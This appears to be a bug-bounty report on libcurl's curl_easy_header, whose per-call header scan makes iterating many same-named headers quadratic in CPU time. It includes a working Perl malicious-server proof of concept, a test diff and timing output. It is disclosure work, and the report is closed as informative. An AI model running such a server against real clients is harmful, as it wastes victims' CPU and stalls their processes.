
curl_easy_header runs at O(N) or worse and can be abused to use minute(s) of CPU time

C
curl
Reported by wolfsage

Vulnerability Details

Technical details and impact analysis

Uncontrolled Resource Consumption
## Summary:

The implementation of curl_easy_header can be abused by a malicious server that puts all headers under a single key. Imagine a server response like:

```
HTTP/1.1 200 OK
a:
a:
a:
a:
[ repeat until MAX_HTTP_RESP_HEADER_SIZE bytes are used ]
```

As a developer, if you want to loop through the headers you do something like the following (taken from tests/libtest/lib1940.c):

```c
if(CURLHE_OK == curl_easy_header(easy, testdata[i], 0, type,
                                 HEADER_REQUEST, &header)) {
  if(header->amount > 1) {
    /* more than one, iterate over them */
    size_t index = 0;
    size_t amount = header->amount;
    do {
      curl_mprintf("- %s == %s (%u/%u)\n", header->name, header->value,
                   (int)index, (int)amount);
      if(++index == amount)
        break;
      if(CURLHE_OK != curl_easy_header(easy, testdata[i], index, type,
                                       HEADER_REQUEST, &header))
        break;
    } while(1);
  }
  else {
    /* only one of this */
    curl_mprintf(" %s == %s\n", header->name, header->value);
  }
}
```

Each call to curl_easy_header loops through every entry, possibly twice: first to count all headers with that name, then to find the index you requested (lib/headers.c):

```c
/* we need a first round to count amount of this header */
for(e = Curl_llist_head(&data->state.httphdrs); e; e = Curl_node_next(e)) {
  hs = Curl_node_elem(e);
  if(strcasecompare(hs->name, name) &&
     (hs->type & type) &&
     (hs->request == request)) {
    amount++;
    pick = hs;
    e_pick = e;
  }
}
if(!amount)
  return CURLHE_MISSING;
else if(nameindex >= amount)
  return CURLHE_BADINDEX;

if(nameindex == amount - 1)
  /* if the last or only occurrence is what's asked for, then we know it */
  hs = pick;
else {
  for(e = Curl_llist_head(&data->state.httphdrs); e; e = Curl_node_next(e)) {
    hs = Curl_node_elem(e);
    if(strcasecompare(hs->name, name) &&
       (hs->type & type) &&
       (hs->request == request) &&
       (match++ == nameindex)) {
      e_pick = e;
      break;
    }
  }
}
```

Iterating over all N occurrences of a header therefore does O(N) work per call and O(N²) work in total, which can add up to minutes or longer depending on hardware.

I did not use AI to generate this report (ugh!)
## Affected version

Currently tested with git @ 283ad5c4320fa1d733e60a0dbe216ee36e3924fb

```
./src/curl -V
curl 8.14.0-DEV (x86_64-pc-linux-gnu) libcurl/8.14.0-DEV OpenSSL/3.0.2 zlib/1.2.11 libpsl/0.21.0
Release-Date: [unreleased]
Protocols: dict file ftp ftps gopher gophers http https imap imaps ipfs ipns mqtt pop3 pop3s rtsp smb smbs smtp smtps telnet tftp ws wss
Features: alt-svc AsynchDNS HSTS HTTPS-proxy IPv6 Largefile libz NTLM PSL SSL threadsafe TLS-SRP UnixSockets
```

## Steps To Reproduce:

Here's a sample perl server you can hit that generates ~300k of headers, all with the key 'a' and no value:

```perl
#!/usr/bin/env perl
use strict;
use warnings;

use IO::Socket qw(AF_INET AF_UNIX SOCK_STREAM SHUT_RDWR);

# Just make a bunch of empty headers so we can fit as many as possible, all
# with the same key:
#
#   a:
#   a:
#   a:
#   a:
#   ...
#
# Much more than this and curl complains:
#
#   Too large response headers: 307204 > 307200
#
my $header_count = 102_390;

my $headers = join("\n", ("a:") x $header_count) . "\n";
my $hlen = length($headers);

print "Using: $hlen bytes for the header with $header_count entries\n\n";

my $server = IO::Socket->new(
  Domain    => AF_INET,
  Type      => SOCK_STREAM,
  Proto     => 'tcp',
  LocalHost => '0.0.0.0',
  LocalPort => 3333,
  ReusePort => 1,
  Listen    => 5,
) || die "Can't open socket: $@";

print "Try http://127.0.0.1:3333\n\n";

while (1) {
  my $client = $server->accept();

  print "Got a client\n";

  # Read the request and ignore it
  my $data = "";
  $client->recv($data, 1024);

  print "Got a request: \n\n" . $data =~ s/^/  /gmr;

  $client->send("HTTP/1.1 200 OK\r\n");

  print "H: $hlen\n";

  while ($hlen > 0) {
    print "Sending a chunk of headers...\n";

    my $sent = $client->send($headers);
    unless (defined $sent) {
      die "  Failed to send? $!\n";
    }

    substr($headers, 0, $sent) = "";
    $hlen -= $sent;

    print "  ..sent $sent bytes\n";
  }

  $client->send("\nhi.\n");

  $client->shutdown(SHUT_RDWR);

  print "Responded\n\n";

  # Reset these each time through
  $headers = join("\n", ("a:") x $header_count) . "\n";
  $hlen = length($headers);
}
```

You can then try it with lib1940.c if you modify it like so:

```diff
diff --git a/tests/libtest/lib1940.c b/tests/libtest/lib1940.c
index 16e288029..9efb0934d 100644
--- a/tests/libtest/lib1940.c
+++ b/tests/libtest/lib1940.c
@@ -27,7 +27,7 @@
 #include "memdebug.h"
 
 static const char *testdata[]={
-  "daTE",
+  "a",
   "Server",
   "content-type",
   "content-length",
```

```
$ time ./lib1940 http://localhost:3333 >/dev/null
[...]
Test ended with result 0

real    0m51.830s
user    0m51.580s
sys     0m0.214s
```

This also means curl itself is affected for anyone using `--write-out '%{header_json}'`:

```
$ time ./src/curl --write-out '%{header_json}' http://localhost:3333 >/dev/null
[...]

real    1m28.856s
user    1m28.702s
sys     0m0.116s
```

## Impact

The impact here seems low to me. You'd have to get someone to hit your server with `--write-out '%{header_json}'`, or with a library that uses `curl_easy_header` to iterate over all values. A single request hitting this will just use up a lot of CPU for a minute or longer, depending on hardware. Unless you can force someone to make many requests and burn a lot of CPU, the damage seems minimal. The bigger issue might be holding up things like cron jobs or other synchronous processes for far longer than they expect to be busy.

Report Details

Additional information and metadata

State

Closed

Substate

Informative

Weakness

Uncontrolled Resource Consumption